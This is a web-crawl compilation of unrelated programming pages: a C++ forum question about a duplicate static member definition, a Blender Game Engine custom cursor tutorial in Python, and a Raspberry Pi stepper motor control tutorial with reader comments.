xamGrid, I would still highly recommend that you make the switch to the xamDataGrid at your earliest convenience. It would be in your applications best interest to make the move. I want you to be using the best controls we have, with the highest quality, the best performance, and the brightest future. If you're making the move and run into any issues or missing features that are a must-have, then please let me know. If you are impacted by this in any way, please connect with me on Twitter (@brianlagunas), or email me directly at blagunas@infragistics.com. I would love to hear your feedback and help you with any questions or concerns you may have.
https://www.infragistics.com/community/blogs/b/infragistics/posts/xamdatagrid-vs-xamgrid-which-wpf-grid-should-i-choose
CC-MAIN-2020-24
refinedweb
1,348
72.16
0 here is my class file: #ifndef BANGER_H #define BANGER_H class Banger { private: static int objectCount; char* driver; char* car; int hits; bool mobile; public: Banger(); Banger(char*,char*); Banger(const Banger &obj); void setDriver( char* ); void setCar( char* ); void setHits( int); void setMobile( bool); char *getDriver(); char *getCar(); int getHits(); bool getMobile(); static int getObjectCount(); }; int Banger::objectCount=0; #endif these are my .cpp file: #include "Banger.h" #include<iostream> #include<cstring> using namespace std; Banger::Banger() { objectCount++; } Banger::Banger(char *name, char *body) { this->driver= new char[strlen(name)+1]; strcpy(driver,name); this->car= new char[strlen(body)+1]; strcpy(car,body); objectCount++; } Banger::Banger(const Banger &obj) { driver= new char[strlen(obj.driver)+1]; strcpy(driver,obj.driver); this->car= new char[strlen(obj.car)+1]; strcpy(car,obj.car); } void Banger::setDriver(char *name) { delete [] driver; driver= new char[strlen(name)+1]; strcpy(driver,name); } void Banger::setCar(char *body) { delete [] car; car= new char[strlen(body)+1]; strcpy(car,body); } void Banger::setHits(int num) { hits=num; } void Banger::setMobile(bool b) { if(b==true) { mobile= true; } else mobile=false; } char* Banger:: getDriver() { return driver; } char* Banger::getCar() { return car; } int Banger::getHits() { return hits; } bool Banger::getMobile() { return mobile; } int Banger::getObjectCount() { return objectCount; } #include<iostream> #include<cstring> #include<fstream> #include<cstdlib> #include<ctime> #include "Banger.h" using namespace std; const int MAX_CARS = 5; const int MAX_LENGTH = 30; const int STOP = 6; int main() { Banger* car[MAX_CARS]; ifstream inFile("competitors.txt"); //Making sure the file is open if(!inFile) { cout << "Error opening file" << endl; return EXIT_FAILURE; } cout << "The CSE 1384 Demolition Derby is now open for registration.\nAre there any takers?" << endl; //Testing default constructor and setters, creating first car (index = 0) car[0] = new Banger; car[0]->setDriver("Max Champ"); car[0]->setCar("truck"); car[0]->setHits(0); car[0]->setMobile(true); cout << "There is now " << Banger::getObjectCount() << " car in the derby." << endl; //Testing the parameter constructor, creating the rest of the cars for(int i = 1; i < MAX_CARS; i++) { char name[MAX_LENGTH], body[MAX_LENGTH]; inFile.getline(name, MAX_LENGTH); inFile.getline(body, MAX_LENGTH); car[i] = new Banger(name, body); //Testing the static object count cout << "There are now " << Banger::getObjectCount() << " cars in the derby." << endl; } //Testing getDriver() and getCar() cout << "Registation is now closed. Here's who we have in our race:" << endl << endl; for(int i = 0; i < MAX_CARS; i++) cout << car[i]->getDriver() << "\t" << car[i]->getCar() << endl; //Testing Object Count cout << "And now it's time for the race!" << endl << endl; cout << endl << "Welcome ladies and gentlemen to the first ever CSE 1384 Demolition Derby.\nWe have "; cout << Banger::getObjectCount() << " cars in the arena to rock your world with all of the" << endl; cout << "smashing and crashing that you could ever hope for. It promises to be an \nexciting night." << endl << endl; //Testing getters cout << "Our returning champion, " << car[0]->getDriver() << ", has come tonight with his newest "; cout << car[0]->getCar() << ".\nThe race hasn't started yet so he has " << car[0]->getHits() << " hits "; cout << "so far,"; if(car[0]->getMobile()) cout << " but is he ever mobile.\nYee-haa! Look at him move. Yessiree, it should be a fine show." <<endl; /*Start of commented out section cout << endl << "Let's start this game." << endl << endl << "BANG!" << endl << endl; srand(time(0)); //The derby -- smashing and crashing. Continues as long as there are more than one banger while(Banger::getObjectCount() > 1) { if(Banger::getObjectCount() < 5) cout << "We're down to "; else cout << "We still have "; cout << Banger::getObjectCount() << " cars in the race." << endl; int basher = rand()% MAX_CARS; //Make sure that the attacking car is still in the game while(car[basher] == 0) basher = rand()% MAX_CARS; int bashed = rand()% MAX_CARS; //Make sure that the car being attacked is a different one from the attacker //and that the car is still in the game while(basher == bashed || car[bashed] == 0) { bashed = rand() % MAX_CARS; } cout << car[basher]->getDriver() << " just hit " << car[bashed]->getDriver() << " and...."<< endl; int hitHard = rand()%10; //if hit hard enough to immobilize the car if(hitHard > STOP) { (*car[basher])++; //Testing overloaded postfix increment operator cout << "Yes! It looks like he can't get his ol' " << car[bashed]->getCar() << " movin'." << endl << "He's out of the game!" << endl; delete car[bashed]; //Testing destructor car[bashed] = 0; } else { ++(*car[basher]); //Testing overloaded prefix increment operator cout << "But he's still moving -- so he's still in the game." << endl; } cout << endl << endl; } cout << "The crowd is going WILD! There's only one car left now. " << endl; //Testing Copy Constructor int i; for(i = 0; i < MAX_CARS; i++) if(car[i] != 0) break; Banger champion = *(car[i]); cout << "So with " << champion.getHits() << " hits in this game, our new champion is...." << "drum-roll please...." << endl << champion.getDriver() << "!!!" << endl << endl << "Everybody be sure to say a big CONGRATULATIONS to "; //Testing overloaded assignment Banger nextReturningChamp; nextReturningChamp = champion; cout << nextReturningChamp.getDriver() << " -- our champion" << endl; cout << "for the next year when we get together and do the whole thing over again." << endl; cout << "Until then, keep on crashin' and a-smashin'!" << endl << endl; */ return EXIT_SUCCESS; } this is the error i got i dnt have a clue what it means? 1>Linking... 1>LINK : C:\Users\Ankit Arya\Documents\Visual Studio 2008\Projects\lab3\Debug\lab3.exe not found or not built by the last incremental link; performing full link 1>lab3.obj : error LNK2005: "private: static int Banger::objectCount" (?objectCount@Banger@@0HA) already defined in Banger.obj 1>C:\Users\Ankit Arya\Documents\Visual Studio 2008\Projects\lab3\Debug\lab3.exe : fatal error LNK1169: one or more multiply defined symbols found and ya here is the txt file Rarin Togo sedan Slugger Hard station wagon Rolin Over volkswagon Mini Van station wagon Max Military jeep
https://www.daniweb.com/programming/software-development/threads/257294/copy-constructors
CC-MAIN-2017-47
refinedweb
957
54.52
BGE: Custom Cursor Blendenzo’s custom cursor tutorial does a great job at providing us with a simple way to add custom cursors to our games. But what if we want it to do more? What if we want to control the sensitivity, or the area that the cursor is in. Well, read on as we return to our Duck Duck Moose game to improve the cursor control with a custom cursor class. We’ll start a bit backwards, by looking through cursor.py and what it does before moving on to how to use it. I placed everything in it’s own class that extends the KX_GameObject so that it can easily be applied to a number of games and the class can be extended to suit needs. It’s designed to be passed the KX_GameObject that is functioning as a cursor. cursor.py: ################################################################## # # # BGE Custom Cursor v1 # # # # By Jay (Battery) # # # # # # # # Feel free to use this as you wish, but please keep this header # # # ################################################################## from bge import render, logic, types, events class Cursor (types.KX_GameObject): def __init__(self, own): self._searchScene = logic.getCurrentScene() self.camera = logic.getCurrentScene().active_camera self.sens = 0.005 self.screenX = render.getWindowWidth() self.screenY = render.getWindowHeight() self.centreX = int(self.screenX/2) self.centreY = int(self.screenY/2) self.searchScene = logic.getCurrentScene() render.setMousePosition(self.centreX, self.centreY) self.cursorPos = [0.5,0.5] self._limits = [0,0,1,1] return @property def searchScene(self): return self._searchScene @searchScene.setter def searchScene(self, scene): for s in logic.getSceneList(): if s.name == scene: self._searchScene = s @property def limits(self): return self._limits @limits.setter def limits(self, limitList): assert isinstance(limitList, (list, tuple)), "Limits must be a list" assert len(limitList) == 4, "limits takes a list of 4 integers [x1,y1,x2,y2]" self._limits = [limitList[0]*0.01, limitList[1]*0.01, 1-(limitList[2]*0.01), 1-(limitList[3]*0.01)] def centreRealCursor(self): render.setMousePosition(self.centreX, self.centreY) return def getMovement(self): mPos = logic.mouse.position x = self.centreX - (mPos[0]*self.screenX) y = self.centreY - (mPos[1]*self.screenY) self.centreRealCursor() return [x, y] def moveCursor(self): movement = self.getMovement() movement[0] *= self.sens movement[1] *= self.sens self.position.x -= movement[0] self.position.y += movement[1] self.cursorPos = self.camera.getScreenPosition(self) if self.cursorPos[0] > self.limits[2] or self.cursorPos[0] < self.limits[0]: self.position.x += movement[0] if self.cursorPos[1] > self.limits[3] or self.cursorPos[1] < self.limits[1]: self.position.y -= movement[1] return def getCursorOver(self, prop=""): cam = self.searchScene.active_camera obj = cam.getScreenRay(self.cursorPos[0], self.cursorPos[1], 1000, prop) return obj def mouseEvents(self): if logic.mouse.events[events.MOUSEX] == logic.KX_INPUT_ACTIVE: self.onCursorMovement() if logic.mouse.events[events.MOUSEY] == logic.KX_INPUT_ACTIVE: self.onCursorMovement() if logic.mouse.events[events.LEFTMOUSE] == logic.KX_INPUT_JUST_ACTIVATED: self.onLeftClick() if logic.mouse.events[events.RIGHTMOUSE] == logic.KX_INPUT_JUST_ACTIVATED: self.onRightClick() if logic.mouse.events[events.MIDDLEMOUSE] == logic.KX_INPUT_JUST_ACTIVATED: self.onMiddleClick() if logic.mouse.events[events.WHEELUPMOUSE] == logic.KX_INPUT_JUST_ACTIVATED: self.onWheelUp() if logic.mouse.events[events.WHEELDOWNMOUSE] == logic.KX_INPUT_JUST_ACTIVATED: self.onWheelDown() return def onCursorMovement(self): self.moveCursor() def onLeftClick(self): pass def onRightClick(self): pass def onMiddleClick(self): pass def onWheelUp(self): pass def onWheelDown(self): pass We treat the cursor exactly like we would if it was a first person camera: keep the mouse cursor centred and measure movement from the centre position. We can then multiply the distance moved by a sensitivity value (self.sens) and add the result to the pseudo-cursor’s position. This task is handled by the methods .centreRealCursor(), .getMovement() and .moveCursor(). For the pseudo-cursor to function as a real cursor we need to keep track of it’s position in the screen space. This is done using the KX_Camera method .getScreenPosition() and is saved in the class variable self.cursorPos[x,y]. The main work is done in .mouseEvents(). This method looks for active events and applies the appropriate function. The methods for events are deliberately left blank so that you can define the action that occurs (we’ll see how later) as each game will handle events differently. The only exception is .onCursorMovement(), which is bound to .moveCursor() unless otherwise specified by the user. For the cursor to interact with the scene the .getCursorOver(prop=””) method is able to return the object that the cursor is over, or None if there isn’t one. You can pass a property so it only picks up objects with that property. Now, here’s where things get a little tricky. If the script is running in an overlay scene, then, by default, the .getCursorOver() method will look in that scene. To specify what scene we want to look for mouse over objects we need to see the variable self.searchScene to the scene we’re after. This just takes the scene’s name as a string, the class will do the rest of the work. Finally, this only works with a scene that has a camera and the camera must be perspective. Orthographic cameras will not return the correct object the mouse is over (this is down to a bug in blender). By being able to set the search scene, we can keep our overlay camera in perspective mode, while allowing us to make sure we’re looking in the right scene. The Cursor() class allows for the setting of limits for the cursor’s operation. By default, this is the game screen. We can set them by assigning a list of 4 integers to the property .limits ( ie. myCursor.limits = [x1,y1,x2,y2]). These values are percentages of screen space. So .limits = [10,10,10,10] would create a boarder 10% of the screen size where the cursor cannot enter. Using percentages means that the cursor’s area of operation remains the same regardless of the screen size. Setting it up Create a new scene, we’ll call it ‘HUD’. In this scene add your cursor object. Make sure that the front of the cursor (what the player sees) is facing up along the world’s Z axis. Now add a camera. Position your camera above the cursor object so it’s looking down the Z axis. All going well, when you look down the camera the Y axis should be up/down for the cursor and the X axis should be left/right. Using the Cursor.py module Create a new script. Let’s call this runCursor.py: import bge import cursor cont = bge.logic.getCurrentController() own = cont.owner own = cursor.Cursor(own) own['over'] = None # Define event actions def leftClick(): obj = own.getCursorOver() if obj: obj['clicked'] = True def hover(): own.moveCursor() obj = own.getCursorOver() if obj and 'hover' in obj: obj.children[0].visible = True own['over'] = obj if own['over'] != obj: if own['over']: own['over'].children[0].visible = False own['over'] = obj own.onLeftClick = leftClick # run by cursor object def run(): own.mouseEvents() # change cursor states def changeSceneToMenu(): own.searchScene = bge.logic.getCurrentScene().name own.limits = [0,0,0,0] own.onCursorMovement = hover own['over'] = None def changeSceneToGame(): own.onCursorMovement = own.moveCursor own.searchScene = 'Game' own.limits = [22,5,22,40] We can now import cursor.py and create a new cursor object. In doing so we pass the KX_GameObject to the Cursor() class and assign the value back to own. We can still access all the usual game object methods through own, only now it can also use the Cursor() methods too. First, we define some event actions. The first is a left click. Here, we use the .getCursorOver() method to grab an object that has been clicked on. There are now numerous things we could do with this object. In this example, it sets a property on the game object to True so the object knows that it has been clicked on and can respond appropriately (in the duck duck moose game this is done through the use of property sensors). Finally, we assign our new leftClick() function to the cursor’s left click function (line 26). We’ve also got a hover action. This combines the .moveCursor() method along with the .getCursorOver() method to act on the object being hovered over. We don’t bind this to any event just yet. This script is designed to be run in module mode, so we create a function called run() that just calls the cursor’s mouseEvents() function. The last 2 functions are designed to be called when the scene changes, by the new scene in a python module controller. Because the script is running in module mode own is still the cursor object. This sets up the context for the cursor’s operation. So when we’re on a menu screen we’ve removed any screen limits and set the .onCursorMovement() method to the new hover function we defined earlier. When we switch to the game scene we change .onCursorMovement() back to the .moveCursor() method. Each time, we’re making sure to update .searchScene. Using these functions we can easily use one instance of the Cursor class to respond to a variety of situations. Setting up logic bricks The last step is to select the cursor object and add a python module controller to a sensor, like this: I used an always sensor to trigger once to initialise the module, then the run() function we defined earlier will be called each time the mouse moves. You could just use an always sense set to true pulse mode as the Cursor.py module does not require any particular sensors/actuators. And that’s all there is to it. A completely, customisable, extendible, programmable cursor for the BGE. Have a look at the Duck Duck Moose game in the resources section below to see it in action. Other ways to use cursor.py Because all the magic is contained within a module you can import it anywhere. This means you can control your cursor from outside the overlay scene and just pass it the cursor object on initialisation. To do this, set the cursor overlay scene up as described above without any logic/python. Then in your main scene your python can look something like this: import bge import cursor cont = bge.logic.getCurrentController() own = cont.owner scene = bge.logic.getCurrentScene() def leftClick(): obj = myCursor.getCursorOver() print(obj) if obj: #do something with the object, like: obj.endObject() if 'cursor' in own: own['cursor'].mouseEvents() else: for s in bge.logic.getSceneList(): if s.name == "HUD": myCursor = s.objects['Cursor'] myCursor = cursor.Cursor(myCursor) #the cursor's camera must be set to the overlay scene camera myCursor.camera = s.active_camera myCursor.onLeftClick = leftClick own['cursor'] = myCursor break Then, providing you’re regularly running myCursor.mouseEvents() it’ll all work fine. This will have the advantage of having the object returned by myCursor.getCursorOver() being in the same script as other parts of the game code. This means that you don’t need to find a way to tell the object/game that something has been clicked on. However, when using this method you need to be aware of two things. Firstly, you need to make sure that the overlay scene has been initialised before trying to pass the cursor class the cursor game object. Secondly, you need to update Cursor.camera to the camera in the overlay scene (line 23 in the above example), otherwise the cursor position will be wrong. Alternatively, you could set the game up just like in the above tutorial, with the all the cusor control happening in the overlay scene, and extend the KX_GameObject class to handle click events: from bge import types, logic class Button (types.KX_GameObject): # extends KX_GameObject to add on click events def __init__(self, own): return def onClick(self): pass def inflate(self): self.localScale[0] += 0.2 self.localScale[1] += 0.2 self.localScale[2] += 0.2 return def deflate(self): self.localScale[0] -= 0.2 self.localScale[1] -= 0.2 self.localScale[2] -= 0.2 return def mutateInflate(): own = logic.getCurrentController().owner own = Button(own) own.onClick = own.inflate own['clickable'] = True def mutateDeflate(): own = logic.getCurrentController().owner own = Button(own) own.onClick = own.deflate own['clickable'] = True This script would be attached to a python module and call the appropriate mutate function for each object. Then runCursor.py would look something like this: import bge import cursor cont = bge.logic.getCurrentController() own = cont.owner own = cursor.Cursor(own) # Define event actions def leftClick(): obj = own.getCursorOver() if obj: if 'clickable' in obj: obj.onClick() own.searchScene = 'Scene' own.onLeftClick = leftClick # run by cursor object def run(): own.mouseEvents() See the resources section below for examples of other ways to use cursor.py Closing Remarks Hopefully, this custom cursor module is useful to people. There’s some bugs to fix and I plan to expand on it and increase it’s functionality (switching cursors, actually implement some error handling, more user control) so will add a post with the latest version when I do. I have other plans for using this cursor object as a base class for a more complex cursor system in a RTS game and will but forward a tutorial on it soon. Until then, any comments, requests for features, questions or noticed any errors, leave a note below. And don’t forget to check out the Blender page for other BGE/Python tutorials. Resources Using cursor.py outside of an overlay scene .blend Extending KX_GameObject to handle on click evets .blend Blendenzo’s original custom cursor tutorial
https://whatjaysaid.wordpress.com/2014/05/05/bge-custom-cursor/
CC-MAIN-2019-04
refinedweb
2,262
60.41
2.1.1770 Part 4 Section 14.8.1.1, txbxContent (Rich Text Box Content Container) For additional notes that apply to this portion of the standard, please see the notes for oMath, §22.1.2.77(f); oMathPara, §22.1.2.78(c). a. The standard states that text box content can be placed inside endnotes, footnotes, comments, or other textboxes. Word does not allow textbox content inside endnotes, footnotes, comments, or other textboxes. b. The standard specifies this element as part of the WordprocessingML namespace. Word will save an mce choice for VML content. txbxContent elements written in that choice will be written in with a namespace value of. This note applies to the following products: Office 2013 Client (Strict), Office 2013 Server (Strict). Show:
https://msdn.microsoft.com/en-us/library/ff534896(v=office.12).aspx
CC-MAIN-2017-43
refinedweb
127
67.04
Hide Forgot Description of problem: When delete a project, the bindings and instance still exist under it. Also if another user create same name project, it can get the instance. Version-Release number of selected component (if applicable): openshift v3.6.172.0.0 kubernetes v1.6.1+5115d708d7 etcd 3.2.1 How reproducible: Always Steps to Reproduce: 1. Create a project and create bindings and instance in it [root@host-8-241-22 dma]# oadm new-project ups Created project ups [root@host-8-241-22 dma]# oc create -f bindings.yaml -n ups binding "ups-binding" created [root@host-8-241-22 dma]# oc create -f instance.yaml -n ups instance "ups-instance" 2. Delete the prject and check bindings and instance [root@host-8-241-22 dma]# oc delete project ups project "ups" deleted [root@host-8-241-22 dma]# [root@host-8-241-22 dma]# oc get project ups Error from server (NotFound): namespaces "ups" not found [root@host-8-241-22 dma]# [root@host-8-241-22 dma]# [root@host-8-241-22 d 3. Login with different user and create same name project then get instance bindigns Actual results: 2. The bindings and instance still exist after delete project 3. Different user can get the instance bindings Expected results: 2. bindings and instance should be removed after delete project 3. Different user shouldn't get the instance and bindings Additional info: The env is installed by openshift-ansible Paul - please triage further, possibly want to doc this as known issue for 3.6, definitely must fix for 3.7. Hi guys, I experience the same issue. Is there currently a workaround to remove remaining bindings and instances ? Using oc delete does not work at all: [root@ocp-master01 archi]# oc get bindings.servicecatalog.k8s.io NAME KIND mongodb-ephemeral-4dzlt-d5nwm Binding.v1alpha1.servicecatalog.k8s.io [root@ocp-master01 archi]# oc delete bindings.servicecatalog.k8s.io mongodb-ephemeral-4dzlt-d5nwm binding "mongodb-ephemeral-4dzlt-d5nwm" deleted [root@ocp-master01 archi]# oc get bindings.servicecatalog.k8s.io NAME KIND mongodb-ephemeral-4dzlt-d5nwm Binding.v1alpha1.servicecatalog.k8s.io Thank you in advance Maxime- When you delete these resources, they have to be finalized before they are fully deleted. This requires communication with the service broker that offers the service, so you will rarely see these resources be fully deleted immediately. You can check the status of the ServiceBinding to get information about what's happening to the object. This seems to work properly with current latest build, but I will retest after is merged. Several notes: if there is an error with the binding, the error condition may block the deletion of the instance and binding. I've got at least 2 example error conditions: 1) create an instance that references a serviceclass from TSB such as mysql-persistent (update service-catalog/go/src/github.com/kubernetes-incubator/service-catalog/contrib/examples/walkthrough/ups-instance.yaml and then oc create -f ups-instance.yaml). Then create a binding for this instance. If you look at the controller logs, you will see errors around the serviceclass, and the instance and binding are in a error condition, ready=false. 2) I installed Ansible Service Broker and then created a hastebin application. Once this was deployed I created a binding for it. In the controller logs, there are errors/warnings like this: type: 'Warning' reason: 'ErrorNonbindableServiceClass' References a non-bindable ClusterServiceClass (K8S: "ab24ffd54da0aefdea5277e0edce8425" ExternalName: "dh-hastebin-apb") and Plan ("default") combination in both cases, because the binding is in an error state, you can't delete it and it blocks cleaning up the associated instance. I'll create an upstream service catalog bug for this and come back with a link. upstream issue for items in comment 5 This all looks to work properly. If using an Ansible installed OpenShift, please ensure it has which was merged today. I'm not sure I understand this comment: > I found there will always leave a new namespace after delete a target namespace. Can you clarify what you meant here? The pod in question appears to be a pod that the ansible broker left running. The ansible broker runs pods in transient namespaces and these are unrelated to the namespace that the service catalog resources (ServiceInstances, ServiceBindings) were created in. Yeah...but the transient namespaces exist all the way, as above shows, the transient namespace "a5fc66c0-e4da-4b9b-a23c-ff7609068e7e" has kept alive 17 hours, is it normally? [root@preserve-jiazha-1024master-etcd-1 ~]# oc get ns | grep a5fc66c0-e4da-4b9b-a23c-ff7609068e7e a5fc66c0-e4da-4b9b-a23c-ff7609068e7e Active 17h In my opinion, the transient namespace should be deleted immediately after deleting the namespace that user created, right? Shawn, Please see if you can reproduce and gain insight into what might be wrong. 1. user deletes the project/namespace. 2. svc catalog sends us a deprovision 3. we attempt to create a svc-acct that has access to deleted namesapce 4. we create the Transient Namespace and run the pod, which can not access the Target Namespace because it does not exist 5. Pod fails and we keep the transient namespace around due to configuration. We can on deprovision request check if the target namespace is gone and then say the deprovision.
https://bugzilla.redhat.com/show_bug.cgi?id=1476173
CC-MAIN-2020-50
refinedweb
882
56.66
Having played with LEDs, switches and buzzers I felt the natural next step was playing with a stepper motor or two. Unlike conventional electric motors, stepper motors allow you to rotate the axis in precise increments. This makes them useful in all sorts of Raspberry Pi projects. Basic Stepper Motor There is a huge selection of stepper motors to buy but I decided to experiment with a 28BJY-48 with ULN2003 control board. The reasons I chose this device where : - It is cheap - Runs on 5V - Easy to interface to the Pi’s GPIO header - Small but relatively powerful - Widely available from both overseas and UK sellers - Easy to obtain with a controller board There are additional details in the Stepper Motor 28BJY-48 Datasheet. Buy Stepper Motors for the Pi The 28BJY-48 stepper motors can be obtained from : Interfacing With The Pi The stepper motor connects to the controller board with a pre-supplied connector. The controller board has six pins which need to be connected to the Pi’s GPIO header : - 5V (P1-02) - GND (P1-06) and - Inp1 (P1-11) - Inp2 (P1-15) - Inp3 (P1-16) - Inp4 (P1-18). Reversing the sequence results in the direction being reversed. Example Stepper Motor Python Script Here is a copy of the stepper motor script I used to rotate the stepper motor. It uses the RPi.GPIO library and defines a 4-step and 8-step sequence. #!/usr/bin/python # Import required libraries import sys import time import RPi.GPIO as GPIO # Use BCM GPIO references # instead of physical pin numbers GPIO.setmode(GPIO.BCM) # Define GPIO signals to use # Physical pins 11,15,16,18 # GPIO17,GPIO22,GPIO23,GPIO24 StepPins = [17,22,23,24] # Set all pins as output for pin in StepPins: print "Setup pins" GPIO.setup(pin,GPIO.OUT) GPIO.output(pin, False) # Define advanced sequence # as shown in manufacturers datasheet Seq = [[1,0,0,1], [1,0,0,0], [1,1,0,0], [0,1,0,0], [0,1,1,0], [0,0,1,0], [0,0,1,1], [0,0,0,1]] StepCount = len(Seq) StepDir = 1 # Set to 1 or 2 for clockwise # Set to -1 or -2 for anti-clockwise # Read wait time from command line if len(sys.argv)>1: WaitTime = int(sys.argv[1])/float(1000) else: WaitTime = 10/float(1000) # Initialise variables StepCounter = 0 # Start main loop while True: print StepCounter, print Seq[StepCounter] for pin in range(0, 4): xpin = StepPins[pin]# if Seq[StepCounter][pin]!=0: print " Enable GPIO %i" %(xpin) GPIO.output(xpin, True) else: GPIO.output(xpin, False) StepCounter += StepDir # If we reach the end of the sequence # start again if (StepCounter>=StepCount): StepCounter = 0 if (StepCounter<0): StepCounter = StepCount+StepDir # Wait before moving on time.sleep(WaitTime) You can download it directly to your Pi using : wget The script needs to be run using “sudo” : sudo python stepper.py Press Ctrl-C to quit. Step Wait Time The script adds a small delay between each step to give the motor time to catch up.In this example the default wait time is set to 0.01 seconds (10 milliseconds). To change the speed of rotation you can change this value. I found I could reduce it to 4ms before the motor stopped working. If the script runs too fast the motor controller can’t keep up. This performance may vary depending on your motor and its controller. To specify a different wait time you can pass a number of milliseconds as an argument on the command line using : sudo python stepper.py 20 where 20 is the number of milliseconds. Step Sequences The complete step sequence consists of 8 steps. If StepDir is set to -2 or 2 the number of steps is reduced to 4.. Final Thoughts You can now control a stepper motor using a Raspberry Pi and a Python script. If you add another motor 😉 🙂 Thanks anyways, this page is a good start with stepper motors. I noticed the opposite! My motor’s common is hooked up to +12V and when GPIOs are off, the coils are presumably hooked up to 0V. It was very unintuitive that when my motor was not doing anything, it got super hot! All stepper motors draw current even when they are not being used. And since your giving it an extra 7v its getting hot. The 24byj48 only use 5v.. I have it wired properly. The lights flash in sync but the motor does not turn. And the motor is getting warm. Using the 5 volts off of the board as shown. What do I need to change? Try increasing the time delay. Also try physically twisting the motor axle at the same time. One of my cheap stepper motors was stuck but started turning with a quick twist. Matt, thanks for the assistance. The motor was actually moving but so slow I was not aware it was advancing. I changed the time delay and now it is moving fast. Do you recommend any sites that can expand on using this little motor? Would like code that moves fast one direction, stops and moves another direction faster. And code that takes input to start, stop and speed changes. Again, thank you for the very quick reply. I have spent a lot of time on your site due to how well you present the information to a new person. Steve, Joplin, Missouri, USA Any reason why I can’t use an external 5V supply (keeping both grounds in common) instead of using the Pi’s? If I do, I wonder if using a level shifter between the controller board and the Pi wouldn’t be a good idea. How can i connect 2 stepper motors on a single raspberrypi? Will I need two control boards? If so then 2 control boards can be connected to a single raspberry pi? Please repl asap. I’ve got my project to be done in 2 weeks. I’m new to raspberry pi. You can connect two stepper motors and you would need two control boards. The second board would be connected to another 4 available GPIO pins. The Python code would need to be modified to use those 4 pins. Thanks so much for the info and the code, got my motor going with only some minor troubles. Some things that would have helped me: Maybe make a note that raspberry pi 2 (and model b) have different GPIO pinouts. Please for future people change the code so on line 37 it casts to a float rather than int. I was trying to get my motor to run quite slow so I did $sudo python stepper.pi 500. Unfortunately as an int this evaluates to 0 and waits for 0 seconds. Hi William, I’ve changed the GPIO pins I use in the example to avoid GPIO27 as that changes between the B and B+ configurations. I’d updated the BitBucket version of the code to fix the wait time issue but hadn’t updates the version on the page. So work ok now. Hello Sir please help me its showing error as below what to do [Traceback (most recent call last): File “/home/pi/stepper1.py”, line 20, in GPIO.setup(pin,GPIO.OUT) RuntimeError: No access to /dev/mem. Try running as root!] Are you using “sudo” to run the Python script? Hi, thanks for the info. This works great for me clockwise but I can’t get it to go anti-clockwise, could I have a faulty motor or am I doing something wrong? I have a Model B version 1.0 and am using physical pins 11, 15, 16 and 18 with step pins [17,22,23,24] in my code. I’d be grateful of any help. Thanks. this works perfect for my setup, all i had to do was change the pin numbers. im trying to put the actual moving of the motor section into a function, wondering how easy that would be? ive been trying: def mover(): for pin in range(0, 4): xpin = StepPins[pin] print StepCounter print pin if Seq[StepCounter][pin]!=0: print ” Step %i Enable %i” %(StepCounter,xpin) GPIO.output(xpin, True) else: GPIO.output(xpin, False) StepCounter += StepDir # If we reach the end of the sequence # start again if (StepCounter>=StepCount): StepCounter = 0 if (StepCounter<0): StepCounter = StepCount # Wait before moving on time.sleep(WaitTime) while True: mover() however this doesnt work? what needs to be passed into this function? There’s a bug in the code where StepDir = -2. It wraps from 0 to 7 (should be 0 to 6). Replace if (StepCounter>=StepCount): StepCounter = 0 if (StepCounter<0): StepCounter = StepCount with StepCounter %= len(Seq) to fix. Also, the full step logic should have two phases on at all times (i.e. the steps with two outputs set to one). Move the two phase arrays to even slots to fix it. Hi Will, I’ve updated the sequence so it starts with two phases energised. I’ve also corrected a bug that got the sequencing wrong for negative steps. Should work much better now. Hi, The cycle skips one step in the sequence. I think the = sign in line 63 is superfluous. You’re right. The sequencing was incorrect. I’ve made a few changes and it should correctly handle StepDir settings of -2,-1,1 and 2. I’ve updated the print statements to make the sequence more obvious. You need >= because StepCount = 8 and the seq array runs 0 .. 7. So when StepCounter = 8 it will get reset to 0 to stay within the array. Hey can you help me? I would like to be the engine only rotates once without continuous loop. My Speed for my Motor is: if len(sys.argv)>1: WaitTime = int(sys.argv[1])/float(1000) else: WaitTime = 0.4/float(1000) I hope you can understand what I want . Can you tell me what I need to change in the script ? ps: sry for my bad englisch i come from ger. You would need to replace the “while true” line with a for loop so it stopped moving after a certain number of steps. The while loop keeps the motor stepping through the sequence. by using your code, yes the motor keep running forever. I’m a newbie in writing a code, so i don’t know how to ”stop” the motor as i reached the desire seq step that i want. You would need to get rid of the “while: true” loop and replace with something that just repeated a set number of times. Perhaps a “for” loop? In the listing above there’s an error in line 53. The if statement should start on a new line. Somebody on the RPF forum just ran into that problem: The script on bitbucket seems to b OK though. Thanks Dirk. I’ve fixed it on the page. There is a strange issue with the syntax highlighter where it refuses to put a line break between those two lines. The page still lists the if statement on the same line as xpin on this page. There is a bug in the code formatter. I had to add a stray # character to keep the “if” on the correct line! Hi Matt, You Mention the pins you are wiring up: Inp1 (P1-18) Inp2 (P1-22) Inp3 (P1-24) Inp4 (P1-26) and then use a different set in the code: # Define GPIO signals to use # Physical pins 11,15,16,18 # GPIO17,GPIO22,GPIO23,GPIO24 StepPins = [17,22,23,24] Well spotted I’ve updated the text so the pins are consistent. That is awesome! I have been looking everywhere for help on this and most things tried to push you to arduino boards, I wanted to control one motor and thought that was overdoing it. Now I get to hack this code, we are using it to control a computer science team’s vending machine. Hello, used your code and it say this: xpin = StepPins[pin]if Seq[StepCounter][pin]!=0: ^ SyntaxError: invalid syntax How can i fix it? Thank you You need to put a line break before the “if”. The code formatter on this site got confused and deleted the line break. The easiest solution is to download the file direct from my Bitbucket repository rather than cut-n-paste from the web page. “# Physical pins 11,15,16,18 # GPIO17,GPIO22,GPIO23,GPIO24 StepPins = [17,22,23,24]” Thank you for this guide! Can you please explain the difference between physical pins and GPIO/StepPins? pins? I can’t figure out why the distinction between them. So Physical Pin 11 is Step Pin 17? Physical Pin 15 is StepPin 22? How is this correlation established? Why aren’t physical pin and GPIO/StepPin numbers the same? The physical pins number the pins from 1 to 40 on the header in sequence. The GPIO numbers refer to signal names coming from the Pi’s CPU. Obviously there is some room for confusion here. You can find a diagram of the Raspberry Pi header that shows both physical pin numbers and GPIO references on the Simple Guide to the Raspberry Pi GPIO Header.
https://www.raspberrypi-spy.co.uk/2012/07/stepper-motor-control-in-python
CC-MAIN-2021-17
refinedweb
2,215
74.9
